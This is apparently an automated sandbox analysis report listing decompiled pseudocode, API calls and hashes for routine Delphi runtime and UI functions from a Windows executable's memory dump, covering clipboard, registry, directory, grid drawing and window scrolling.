0x00432681
0x00432681
0x0043268e
0x00432693
0x00432698
0x0043269a
0x0043269d
0x004326ad
0x0043263c
0x0043263c
0x00432643
0x00432648
0x0043264a
0x00000000
0x00000000
0x0043267a
0x0043267c
0x0043267f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0043267f
0x00432650
0x00432665
0x0043266a
0x004326ba
0x004326ba
0x00000000

APIs

EnumClipboardFormats.USER32(00000000,00000000,004326AE), ref: 00432630
GetClipboardData.USER32 ref: 00432650
GetClipboardData.USER32 ref: 00432659
EnumClipboardFormats.USER32(00000000,00000000,00000000,004326AE), ref: 00432675

Strings

lw@, xrefs: 00432689

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Clipboard$DataEnumFormats
String ID: lw@
API String ID: 1256399260-2821604855
Opcode ID: 40ecbce39717903af30691bdfb332a16639d0e3130d703441a8a4c908bdab455
Instruction ID: f3266d62fa59fde523ff37e644adff5ef05723a53766d82c8475c8e7dbbf3540
Opcode Fuzzy Hash: 40ecbce39717903af30691bdfb332a16639d0e3130d703441a8a4c908bdab455
Instruction Fuzzy Hash: A011E371700200AFDA00EF66EA5296A77E9EF8D358B10007BF9049B391DDB99C1196A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040342C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49
registryCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E0040342C() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x47100c & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x47100c; // 0x1332
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x47100c = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E0040349D);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x4034a4);
					return RegCloseKey(_v8);
				}
			}

0x0040342d
0x0040342f
0x00403439
0x00403455
0x004034a4
0x004034b6
0x004034b9
0x004034c2
0x00403457
0x00403459
0x0040345a
0x0040345f
0x00403462
0x00403465
0x00403481
0x00403488
0x0040348b
0x0040348e
0x0040349c
0x0040349c

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040344E
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,0040349D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403481
RegCloseKey.ADVAPI32(?,004034A4,00000000,?,00000004,00000000,0040349D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403497

Strings

SOFTWARE\Borland\Delphi\RTL, xrefs: 00403444
FPUMaskValue, xrefs: 00403478

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: 849114cac64487da2203560a0741183ae2dbbad8fafeb926836a7176adce9f49
Instruction ID: 7e82fee9bd4af98ce6fec7a920c5848dee0106fdfb5f57a5500131e2059f6c8c
Opcode Fuzzy Hash: 849114cac64487da2203560a0741183ae2dbbad8fafeb926836a7176adce9f49
Instruction Fuzzy Hash: 8101B579510348BAEB12DF91CD02BA9B7ACDB04B15F2044B6B904E6AD0E6785A50C75C

Uniqueness

Uniqueness Score: -1.00%

Function 004028FC, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004028FC(void* __eax, void* __edx) {
				char _v271;
				char _v532;
				char _v534;
				char _v535;
				void* _t21;
				void* _t25;
				CHAR* _t26;

				_t25 = __edx;
				_t21 = __eax;
				if(__eax != 0) {
					 *_t26 = 0x40;
					_v535 = 0x3a;
					_v534 = 0;
					GetCurrentDirectoryA(0x105,  &_v271);
					SetCurrentDirectoryA(_t26);
				}
				GetCurrentDirectoryA(0x105,  &_v532);
				if(_t21 != 0) {
					SetCurrentDirectoryA( &_v271);
				}
				return E00404588(_t25, 0x105,  &_v532);
			}

0x00402904
0x00402906
0x0040290a
0x00402914
0x00402917
0x0040291c
0x0040292e
0x00402934
0x00402934
0x00402943
0x0040294a
0x00402954
0x00402954
0x00402971

APIs

GetCurrentDirectoryA.KERNEL32(00000105,?,?,?,00468B87), ref: 0040292E
SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,?,00468B87), ref: 00402934
GetCurrentDirectoryA.KERNEL32(00000105,?,?,?,00468B87), ref: 00402943
SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,?,00468B87), ref: 00402954

Strings

:, xrefs: 00402917

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: e34b70673b6ddc3234c340ae9250c5dc95551a513d277a8d133446c9483d1341
Instruction ID: e280489c4e77a9dbbac942a73009b5f8a6c13a22013b3f11ed9b453d4861a154
Opcode Fuzzy Hash: e34b70673b6ddc3234c340ae9250c5dc95551a513d277a8d133446c9483d1341
Instruction Fuzzy Hash: 9FF096763446C05AE310E6688852BDB72DC8B55344F04442EBBC8D73C2E6B8994857A7

Uniqueness

Uniqueness Score: -1.00%

Function 0045F454, Relevance: 7.8, APIs: 5, Instructions: 251
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0045F454(signed int __eax, long __ecx, char __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				long _v12;
				char _v16;
				signed int _v17;
				struct tagRECT _v33;
				struct tagRECT _v49;
				struct tagRECT _v65;
				void* __edi;
				void* __ebp;
				intOrPtr _t138;
				intOrPtr _t148;
				signed int _t163;
				signed int _t166;
				intOrPtr _t167;
				intOrPtr _t180;
				intOrPtr _t181;
				intOrPtr _t182;
				intOrPtr _t183;
				signed int _t188;
				intOrPtr _t201;
				intOrPtr _t202;
				intOrPtr _t205;
				intOrPtr _t206;
				intOrPtr _t232;
				intOrPtr _t233;
				intOrPtr _t234;
				intOrPtr _t235;
				intOrPtr _t236;
				intOrPtr _t238;
				intOrPtr* _t240;
				signed int _t252;
				intOrPtr _t253;
				intOrPtr _t256;
				signed int _t257;
				void* _t265;

				_v12 = __ecx;
				_v8 = __eax;
				_t240 = _a24 + 0xfffffffc;
				_v16 = __edx;
				_v49.top = _a20;
				while(1) {
					_t138 = _v49.top;
					if(_t138 >= _a12) {
						break;
					}
					_t138 =  *((intOrPtr*)( *_t240 + 0x24c));
					if(_t138 > _v16) {
						_t257 = _v8;
						_v49.left = _v12;
						_v49.bottom = E00462E5C( *_t240, _v16) + _v49.top;
						while(1) {
							__eflags = _v49.left - _a16;
							if(_v49.left >= _a16) {
								break;
							}
							_t148 =  *_t240;
							__eflags = _t257 -  *((intOrPtr*)(_t148 + 0x21c));
							if(_t257 <  *((intOrPtr*)(_t148 + 0x21c))) {
								_v49.right = E00462E3C( *_t240, _t257) + _v49.left;
								__eflags = _v49.right - _v49.left;
								if(_v49.right <= _v49.left) {
									L39:
									_v49.left =  *((intOrPtr*)(_a24 - 0x70)) + _v49.right;
									_t257 = _t257 + 1;
									__eflags = _t257;
									continue;
								}
								__eflags = RectVisible(E00420244( *((intOrPtr*)( *_t240 + 0x208))),  &_v49);
								if(__eflags == 0) {
									goto L39;
								} else {
									_v17 = _a4;
									_t163 = E0045EC84( *_t240, __eflags);
									__eflags = _t163;
									if(_t163 != 0) {
										_t236 =  *_t240;
										__eflags =  *((intOrPtr*)(_t236 + 0x22c)) - _v16;
										if( *((intOrPtr*)(_t236 + 0x22c)) == _v16) {
											_t238 =  *_t240;
											__eflags = _t257 -  *((intOrPtr*)(_t238 + 0x228));
											if(_t257 ==  *((intOrPtr*)(_t238 + 0x228))) {
												_t24 =  &_v17;
												 *_t24 = _v17 | 0x00000002;
												__eflags =  *_t24;
											}
										}
									}
									_t242 = _a24 - 0x80;
									_t166 = E0045D9B8(_t257, _a24 - 0x80, _v16);
									__eflags = _t166;
									if(_t166 != 0) {
										_t29 =  &_v17;
										 *_t29 = _v17 | 0x00000001;
										__eflags =  *_t29;
									}
									__eflags = _v17 & 0x00000002;
									if((_v17 & 0x00000002) == 0) {
										L14:
										_t167 =  *_t240;
										__eflags =  *((char*)(_t167 + 0x28c));
										if( *((char*)(_t167 + 0x28c)) != 0) {
											L16:
											_t260 =  *((intOrPtr*)( *_t240 + 0x208));
											E00420140( *((intOrPtr*)( *_t240 + 0x208)));
											__eflags = _v17 & 0x00000001;
											if(__eflags == 0) {
												L20:
												E0041F7B8( *((intOrPtr*)(_t260 + 0x14)), _t242, _a8, _t257, _t265, __eflags);
												L21:
												E0041FE50(_t260,  &_v49);
												L22:
												 *((intOrPtr*)( *((intOrPtr*)( *_t240)) + 0xd4))(_v17,  &_v49);
												_t180 =  *_t240;
												__eflags =  *((char*)(_t180 + 0x28c));
												if( *((char*)(_t180 + 0x28c)) != 0) {
													__eflags = _v17 & 0x00000004;
													if((_v17 & 0x00000004) != 0) {
														_t201 =  *_t240;
														__eflags =  *((char*)(_t201 + 0x1a5));
														if( *((char*)(_t201 + 0x1a5)) != 0) {
															_t202 = _a24;
															_t253 = _a24;
															__eflags =  *(_t202 - 0x84) |  *(_t253 - 0x88);
															if(( *(_t202 - 0x84) |  *(_t253 - 0x88)) != 0) {
																asm("movsd");
																asm("movsd");
																asm("movsd");
																asm("movsd");
																_t257 = _t257;
																_t205 = _a24;
																__eflags =  *(_t205 - 0x84) & 0x00000004;
																if(( *(_t205 - 0x84) & 0x00000004) != 0) {
																	_t206 = _a24;
																	__eflags =  *(_t206 - 0x84) & 0x00000008;
																	if(( *(_t206 - 0x84) & 0x00000008) == 0) {
																		_t88 =  &(_v65.bottom);
																		 *_t88 = _v65.bottom +  *((intOrPtr*)(_a24 - 0x40));
																		__eflags =  *_t88;
																	}
																} else {
																	_v65.right = _v65.right +  *((intOrPtr*)(_a24 - 0x70));
																}
																DrawEdge(E00420244( *((intOrPtr*)( *_t240 + 0x208))),  &_v65, 4,  *(_a24 - 0x84));
																DrawEdge(E00420244( *((intOrPtr*)( *_t240 + 0x208))),  &_v65, 4,  *(_a24 - 0x88));
															}
														}
													}
												}
												_t181 =  *_t240;
												__eflags =  *((char*)(_t181 + 0x28c));
												if( *((char*)(_t181 + 0x28c)) != 0) {
													_t182 =  *_t240;
													__eflags =  *(_t182 + 0x1c) & 0x00000010;
													if(( *(_t182 + 0x1c) & 0x00000010) == 0) {
														__eflags = _v17 & 0x00000002;
														if((_v17 & 0x00000002) != 0) {
															_t183 =  *_t240;
															_t252 =  *0x45f788; // 0x2400
															__eflags = _t252 - ( *(_t183 + 0x248) &  *0x45f788);
															if(_t252 != ( *(_t183 + 0x248) &  *0x45f788)) {
																__eflags =  *( *_t240 + 0x249) & 0x00000010;
																if(__eflags == 0) {
																	_t188 = E004037B0( *_t240, __eflags);
																	__eflags = _t188;
																	if(_t188 != 0) {
																		asm("movsd");
																		asm("movsd");
																		asm("movsd");
																		asm("movsd");
																		_t257 = _t257;
																		_v33.left = _v49.right;
																		_v33.right = _v49.left;
																		DrawFocusRect(E00420244( *((intOrPtr*)( *_t240 + 0x208))),  &_v33);
																	} else {
																		DrawFocusRect(E00420244( *((intOrPtr*)( *_t240 + 0x208))),  &_v49);
																	}
																}
															}
														}
													}
												}
												goto L39;
											}
											__eflags = _v17 & 0x00000002;
											if(__eflags == 0) {
												L19:
												E0041F7B8( *((intOrPtr*)(_t260 + 0x14)), _t242, 0x8000000d, _t257, _t265, __eflags);
												E0041EFCC( *((intOrPtr*)(_t260 + 0xc)), 0x8000000e);
												goto L21;
											}
											_t256 =  *0x45f784; // 0x0
											__eflags = _t256 - ( *( *_t240 + 0x248) &  *0x45f780);
											if(__eflags == 0) {
												goto L20;
											}
											goto L19;
										}
										_t232 =  *_t240;
										__eflags =  *(_t232 + 0x1c) & 0x00000010;
										if(( *(_t232 + 0x1c) & 0x00000010) == 0) {
											goto L22;
										}
										goto L16;
									}
									_t233 =  *_t240;
									__eflags =  *(_t233 + 0x249) & 0x00000004;
									if(( *(_t233 + 0x249) & 0x00000004) == 0) {
										goto L14;
									}
									_t234 =  *_t240;
									__eflags =  *((char*)(_t234 + 0x28d));
									if( *((char*)(_t234 + 0x28d)) == 0) {
										goto L14;
									}
									_t235 =  *_t240;
									__eflags =  *(_t235 + 0x1c) & 0x00000010;
									if(( *(_t235 + 0x1c) & 0x00000010) == 0) {
										goto L39;
									}
									goto L14;
								}
							}
							break;
						}
						_v49.top =  *((intOrPtr*)(_a24 - 0x40)) + _v49.bottom;
						_t130 =  &_v16;
						 *_t130 = _v16 + 1;
						__eflags =  *_t130;
						continue;
					}
					break;
				}
				return _t138;
			}

0x0045f45d
0x0045f460
0x0045f466
0x0045f469
0x0045f46f
0x0045f75d
0x0045f75d
0x0045f763
0x00000000
0x00000000
0x0045f767
0x0045f770
0x0045f477
0x0045f47d
0x0045f48d
0x0045f738
0x0045f73b
0x0045f73e
0x00000000
0x00000000
0x0045f740
0x0045f742
0x0045f748
0x0045f4a1
0x0045f4a7
0x0045f4aa
0x0045f72b
0x0045f734
0x0045f737
0x0045f737
0x00000000
0x0045f737
0x0045f4c7
0x0045f4c9
0x00000000
0x0045f4cf
0x0045f4d2
0x0045f4d7
0x0045f4dc
0x0045f4de
0x0045f4e0
0x0045f4e8
0x0045f4eb
0x0045f4ed
0x0045f4ef
0x0045f4f5
0x0045f4f7
0x0045f4f7
0x0045f4f7
0x0045f4f7
0x0045f4f5
0x0045f4eb
0x0045f4fe
0x0045f506
0x0045f50b
0x0045f50d
0x0045f50f
0x0045f50f
0x0045f50f
0x0045f50f
0x0045f513
0x0045f517
0x0045f53b
0x0045f53b
0x0045f53d
0x0045f544
0x0045f54e
0x0045f550
0x0045f55d
0x0045f562
0x0045f566
0x0045f5a6
0x0045f5ac
0x0045f5b1
0x0045f5b6
0x0045f5bb
0x0045f5cc
0x0045f5d2
0x0045f5d4
0x0045f5db
0x0045f5e1
0x0045f5e5
0x0045f5eb
0x0045f5ed
0x0045f5f4
0x0045f5fa
0x0045f603
0x0045f606
0x0045f60c
0x0045f615
0x0045f616
0x0045f617
0x0045f618
0x0045f619
0x0045f61a
0x0045f61d
0x0045f624
0x0045f631
0x0045f634
0x0045f63b
0x0045f643
0x0045f643
0x0045f643
0x0045f643
0x0045f626
0x0045f62c
0x0045f62c
0x0045f664
0x0045f687
0x0045f687
0x0045f60c
0x0045f5f4
0x0045f5e5
0x0045f68c
0x0045f68e
0x0045f695
0x0045f69b
0x0045f69d
0x0045f6a1
0x0045f6a7
0x0045f6ab
0x0045f6ad
0x0045f6bd
0x0045f6c4
0x0045f6c7
0x0045f6cb
0x0045f6d2
0x0045f6da
0x0045f6df
0x0045f6e1
0x0045f703
0x0045f704
0x0045f705
0x0045f706
0x0045f707
0x0045f70b
0x0045f711
0x0045f726
0x0045f6e3
0x0045f6f5
0x0045f6f5
0x0045f6e1
0x0045f6d2
0x0045f6c7
0x0045f6ab
0x0045f6a1
0x00000000
0x0045f695
0x0045f568
0x0045f56c
0x0045f58a
0x0045f592
0x0045f59f
0x00000000
0x0045f59f
0x0045f57e
0x0045f585
0x0045f588
0x00000000
0x00000000
0x00000000
0x0045f588
0x0045f546
0x0045f548
0x0045f54c
0x00000000
0x00000000
0x00000000
0x0045f54c
0x0045f519
0x0045f51b
0x0045f522
0x00000000
0x00000000
0x0045f524
0x0045f526
0x0045f52d
0x00000000
0x00000000
0x0045f52f
0x0045f531
0x0045f535
0x00000000
0x00000000
0x00000000
0x0045f535
0x0045f4c9
0x00000000
0x0045f748
0x0045f757
0x0045f75a
0x0045f75a
0x0045f75a
0x00000000
0x0045f75a
0x00000000
0x0045f770
0x0045f77c

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 291672cb03b6b348231bbd77b757c6f2ad9f55b06839b359aaf34f81d31a35fc
Instruction ID: b4e9dd2361f3f3499cadb4ed65a74cec6556d423131664ea70124733f558b63e
Opcode Fuzzy Hash: 291672cb03b6b348231bbd77b757c6f2ad9f55b06839b359aaf34f81d31a35fc
Instruction Fuzzy Hash: 04B12875A005189FCB10DF5CC088BDEB7F5AF09304F5440A6ED48AB366D778AC4ACB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00451C90, Relevance: 7.7, APIs: 5, Instructions: 171
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00451C90(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				signed char _t92;
				int _t98;
				int _t100;
				intOrPtr _t117;
				int _t122;
				intOrPtr _t155;
				void* _t164;
				signed char _t180;
				intOrPtr _t182;
				intOrPtr _t194;
				int _t199;
				intOrPtr _t203;
				void* _t204;

				_t204 = __eflags;
				_t202 = _t203;
				_v8 = __eax;
				E0043BD60(_v8);
				_push(_t203);
				_push(0x451ee6);
				_push( *[fs:edx]);
				 *[fs:edx] = _t203;
				 *(_v8 + 0x268) = 0;
				 *(_v8 + 0x26c) = 0;
				 *(_v8 + 0x270) = 0;
				_t164 = 0;
				_t92 =  *0x48f709; // 0x0
				 *(_v8 + 0x234) = _t92 ^ 0x00000001;
				E0043B4D0(_v8, 0, __edx, _t204);
				if( *(_v8 + 0x25c) == 0 ||  *(_v8 + 0x270) <= 0) {
					L12:
					_t98 =  *(_v8 + 0x268);
					_t213 = _t98;
					if(_t98 > 0) {
						E004386D8(_v8, _t98, _t213);
					}
					_t100 =  *(_v8 + 0x26c);
					_t214 = _t100;
					if(_t100 > 0) {
						E0043871C(_v8, _t100, _t214);
					}
					_t180 =  *0x451ef4; // 0x0
					 *(_v8 + 0x98) = _t180;
					_t215 = _t164;
					if(_t164 == 0) {
						E004511F8(_v8, 1, 1);
						E0043EE74(_v8, 1, 1, _t215);
					}
					E00439EA4(_v8, 0, 0xb03d, 0);
					_pop(_t182);
					 *[fs:eax] = _t182;
					_push(0x451eed);
					return E0043BD68(_v8);
				} else {
					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
						_t194 =  *0x48fc00; // 0x2130f1c
						if( *(_v8 + 0x25c) !=  *((intOrPtr*)(_t194 + 0x40))) {
							_t155 =  *0x48fc00; // 0x2130f1c
							E0041F1B4( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E0041F1AC( *((intOrPtr*)(_v8 + 0x68))),  *(_t155 + 0x40),  *(_v8 + 0x25c)), __edi, _t202);
						}
					}
					_t117 =  *0x48fc00; // 0x2130f1c
					 *(_v8 + 0x25c) =  *(_t117 + 0x40);
					_t199 = E00452018(_v8);
					_t122 =  *(_v8 + 0x270);
					_t209 = _t199 - _t122;
					if(_t199 != _t122) {
						_t164 = 1;
						E004511F8(_v8, _t122, _t199);
						E0043EE74(_v8,  *(_v8 + 0x270), _t199, _t209);
						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
							 *(_v8 + 0x268) = MulDiv( *(_v8 + 0x268), _t199,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
							 *(_v8 + 0x26c) = MulDiv( *(_v8 + 0x26c), _t199,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
							 *(_v8 + 0x1fa) = MulDiv( *(_v8 + 0x1fa), _t199,  *(_v8 + 0x270));
							 *(_v8 + 0x1fe) = MulDiv( *(_v8 + 0x1fe), _t199,  *(_v8 + 0x270));
						}
					}
					goto L12;
				}
			}

0x00451c90
0x00451c91
0x00451c98
0x00451c9e
0x00451ca5
0x00451ca6
0x00451cab
0x00451cae
0x00451cb6
0x00451cc1
0x00451ccc
0x00451cd2
0x00451cd4
0x00451cde
0x00451ce9
0x00451cf8
0x00451e5a
0x00451e5d
0x00451e63
0x00451e65
0x00451e6c
0x00451e6c
0x00451e74
0x00451e7a
0x00451e7c
0x00451e83
0x00451e83
0x00451e8b
0x00451e91
0x00451e97
0x00451e99
0x00451ea8
0x00451eba
0x00451eba
0x00451ecb
0x00451ed2
0x00451ed5
0x00451ed8
0x00451ee5
0x00451d0e
0x00451d18
0x00451d23
0x00451d2c
0x00451d38
0x00451d58
0x00451d58
0x00451d2c
0x00451d5d
0x00451d68
0x00451d76
0x00451d7b
0x00451d81
0x00451d83
0x00451d89
0x00451d92
0x00451da5
0x00451db4
0x00451dd3
0x00451dd3
0x00451de3
0x00451e02
0x00451e02
0x00451e12
0x00451e31
0x00451e54
0x00451e54
0x00451e12
0x00000000
0x00451d83

APIs

MulDiv.KERNEL32(00000000,?,00000000), ref: 00451D4F
MulDiv.KERNEL32(?,00000000,00000000), ref: 00451DCB
MulDiv.KERNEL32(?,00000000,00000000), ref: 00451DFA
MulDiv.KERNEL32(?,00000000,00000000), ref: 00451E29
MulDiv.KERNEL32(?,00000000,00000000), ref: 00451E4C

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b4eb30459db01a10f30461069ae4cc54e604348172e9ad259c6495fe1880cb4
Instruction ID: 0e5b86d717b15d9533dc8caa314275a7ada1c464aef0b82d17d310680002eed7
Opcode Fuzzy Hash: 6b4eb30459db01a10f30461069ae4cc54e604348172e9ad259c6495fe1880cb4
Instruction Fuzzy Hash: 5D71C674A04104EFDB00DBA9C58AFAEB7F5AF49304F2541F9E808DB362C735AE459B44

Uniqueness

Uniqueness Score: -1.00%

Function 00461670, Relevance: 7.7, APIs: 5, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00461670(void* __eax, int __ecx, signed int __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				struct tagRECT _v28;
				char _v44;
				int _t90;
				void* _t109;
				void* _t112;
				void* _t125;
				void* _t131;
				intOrPtr _t142;
				int _t143;

				_t143 = __ecx;
				_v8 = __edx;
				_t125 = __eax;
				_t142 = _a4;
				_v12 = 2;
				if( *((char*)(__eax + 0x28c)) == 0) {
					_v12 = _v12 | 0x00000004;
				}
				_t147 = _t143;
				if(_t143 != 0) {
					__eflags = _v8;
					if(__eflags != 0) {
						_t29 = _t142 + 0x34; // 0xe89c933
						_t31 = _t142 + 0xc; // 0x895653ec
						_t32 = _t142 + 4; // 0x55c35b5e
						E00412AB0( *_t32,  *_t31, 0,  &_v28,  *_t29);
						ScrollWindowEx(E0043F370(_t125), _v8, 0,  &_v28,  &_v28, 0, 0, _v12);
						_t37 = _t142 + 0x3c; // 0x55894233
						_t39 = _t142 + 4; // 0x55c35b5e
						_t40 = _t142 + 0x34; // 0xe89c933
						__eflags = 0;
						E00412AB0(0,  *_t39,  *_t40,  &_v28,  *_t37);
						ScrollWindowEx(E0043F370(_t125), 0, _t143,  &_v28,  &_v28, 0, 0, _v12);
						_t44 = _t142 + 0x3c; // 0x55894233
						_t46 = _t142 + 0xc; // 0x895653ec
						_t47 = _t142 + 0x34; // 0xe89c933
						_t48 = _t142 + 4; // 0x55c35b5e
						E00412AB0( *_t48,  *_t46,  *_t47,  &_v28,  *_t44);
						_t90 = ScrollWindowEx(E0043F370(_t125), _v8, _t143,  &_v28,  &_v28, 0, 0, _v12);
					} else {
						_t22 = _t142 + 0x3c; // 0x55894233
						_t24 = _t142 + 0xc; // 0x895653ec
						_t25 = _t142 + 0x34; // 0xe89c933
						E00412AB0(0,  *_t24,  *_t25,  &_v28,  *_t22);
						_t90 = ScrollWindowEx(E0043F370(_t125), 0, _t143,  &_v28,  &_v28, 0, 0, _v12);
					}
				} else {
					if(E004037B0(_t125, _t147) != 0) {
						_t11 = _t142 + 0x3c; // 0x55894233
						_push( *_t11);
						_push( &_v28);
						_t109 = E004386C0(_t125);
						_t13 = _t142 + 4; // 0x55c35b5e
						_push(_t109 -  *_t13);
						_t112 = E004386C0(_t125);
						_t14 = _t142 + 0xc; // 0x895653ec
						__eflags = 0;
						_pop(_t131);
						E00412AB0(_t112 -  *_t14, _t131, 0);
						_v8 =  ~_v8;
					} else {
						_t7 = _t142 + 0x3c; // 0x55894233
						_t9 = _t142 + 0xc; // 0x895653ec
						_t10 = _t142 + 4; // 0x55c35b5e
						E00412AB0( *_t10,  *_t9, 0,  &_v28,  *_t7);
					}
					_t90 = ScrollWindowEx(E0043F370(_t125), _v8, 0,  &_v28,  &_v28, 0, 0, _v12);
				}
				_t149 =  *(_t125 + 0x249) & 0x00000010;
				if(( *(_t125 + 0x249) & 0x00000010) == 0) {
					return _t90;
				} else {
					E00462E7C(_t125,  &_v44);
					return E00460D6C(_t125,  &_v44, _t149);
				}
			}

0x00461679
0x0046167b
0x0046167e
0x00461680
0x00461683
0x00461691
0x00461693
0x00461693
0x00461697
0x00461699
0x00461711
0x00461715
0x00461751
0x00461759
0x0046175c
0x00461761
0x00461784
0x00461789
0x00461791
0x00461794
0x00461797
0x00461799
0x004617b9
0x004617be
0x004617c6
0x004617c9
0x004617cc
0x004617cf
0x004617f1
0x00461717
0x00461717
0x0046171f
0x00461722
0x00461727
0x00461747
0x00461747
0x0046169b
0x004616a8
0x004616c1
0x004616c4
0x004616c8
0x004616cb
0x004616d0
0x004616d3
0x004616d6
0x004616db
0x004616de
0x004616e0
0x004616e1
0x004616e6
0x004616aa
0x004616aa
0x004616b2
0x004616b5
0x004616ba
0x004616ba
0x00461707
0x00461707
0x004617f6
0x004617fd
0x00461819
0x004617ff
0x00461804
0x00000000
0x0046180e

APIs

ScrollWindowEx.USER32 ref: 00461707
ScrollWindowEx.USER32 ref: 00461747
ScrollWindowEx.USER32 ref: 00461784
ScrollWindowEx.USER32 ref: 004617B9
ScrollWindowEx.USER32 ref: 004617F1

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: ScrollWindow
String ID:
API String ID: 2126015319-0
Opcode ID: b7d6ec1451abac277d570761dfb0fe26c4282e162535dcda5698a1e1f187b957
Instruction ID: 8d79e7150e47965d6d92bec0e408df0ecc16c9197a668feb19aa42116886768c
